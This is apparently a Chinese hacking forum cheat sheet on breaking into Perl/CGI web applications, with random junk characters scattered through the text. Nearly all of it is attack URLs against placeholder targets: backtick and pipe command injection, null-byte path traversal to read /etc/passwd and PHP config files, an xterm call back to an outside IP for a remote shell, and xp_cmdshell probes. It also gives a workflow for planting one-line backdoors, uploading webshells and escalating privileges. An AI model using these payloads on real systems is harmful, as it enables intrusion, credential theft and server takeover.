总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 + {$ i! t' Y4 h
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
4 } R" H0 V+ M2 K6 c3 A感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们 7 U- Z5 D3 I" J3 q) V
注“ 1 A9 B, X; i; Z5 M4 h; ]. ~/ k
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。
& w. m& G* j8 C4 j/ r: h8 i: J以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET ( ?" \/ h* |+ \, t4 q7 g
; K1 _6 Y) M( j) Ahttp://target.com/cgi-bin/home/news/sub.pl?12 随意构造
: r( T9 E1 u% y ]http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢 ( Z+ X2 V# U/ W( m! i
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号 2 ~+ f1 O5 w/ R! k
http://target.com/cgi-bin/home/news/sub.pl?`id`
$ I$ R# ^ L; ~' ]http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` 7 M& h6 J% D- j
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示
+ o k8 M& j% b) \7 ~+ U
/ Z7 w% L4 b {http://target.com/test.pl;ls| " M8 ~- C+ k" ]5 F9 i( t% b
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
H$ g( s) B! X* {; R8 ]http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|
" J* U" X/ p( A& o @2 Lhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造
1 X+ U, m7 U4 l5 c; O y' ~4 B比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
- F* [& R0 B1 {5 f/ dhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection
( i+ v {0 _6 O) _0 S
" c) ^, [* S2 Bhttp://target.com/test.pl?&........ /../../etc/passwd
# W' S, }" E2 R; |7 h* Y
" Q; ^6 x1 O9 D5 K khttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./ 6 d7 J$ e' o; w: B9 R! m
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了 " }. v# o' n3 j! ~
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 # y' x) _% _$ ^7 w2 Z- l& I0 a
6 A; j; C. E. l3 t1 |' ghttp://www.target.org/show.php?f ... /include/config.php 查看php代码 ; D) {5 T: e# h5 y
http://www.target.org/show.php?f ... ng/admin/global.php
) n# K: O: ~4 k& ?& K4 `
& Q9 r5 ?, [/ f G8 R$ Jemm和ps的一句话
" N' W" ~6 V c7 ]3 U9 n8 W5 S9 J" Q
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 $ G% r! a; Z; A6 D/ I
' ]0 L, L/ ~5 S/ D: ? L>bbb%20|
: A+ ^$ P- n* B7 P# v9 W4 h" ?8 K
9 h, P; M. J7 }0 D! [3 ^$ dhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串 ( g( Q* I/ h4 E( `$ Q, A2 M
r) y. \9 ~. y. d$ s: l5 c
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 . r% q4 ^4 K" n5 `
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin 9 K ^5 @ A7 o1 }! a
# R3 i) N+ G! S% @, E6 N+ I相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 , g$ ^( f' `2 e1 H0 u
http://target.com/index.html#cmd.exe 8 M- Y- s; U, L6 ]+ ~
http://target.com/index.html?dummyparam=xp_cmdshell * x7 J5 l$ n: w! |1 h/ G7 f
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
7 y/ x5 l* _, B' i5 g |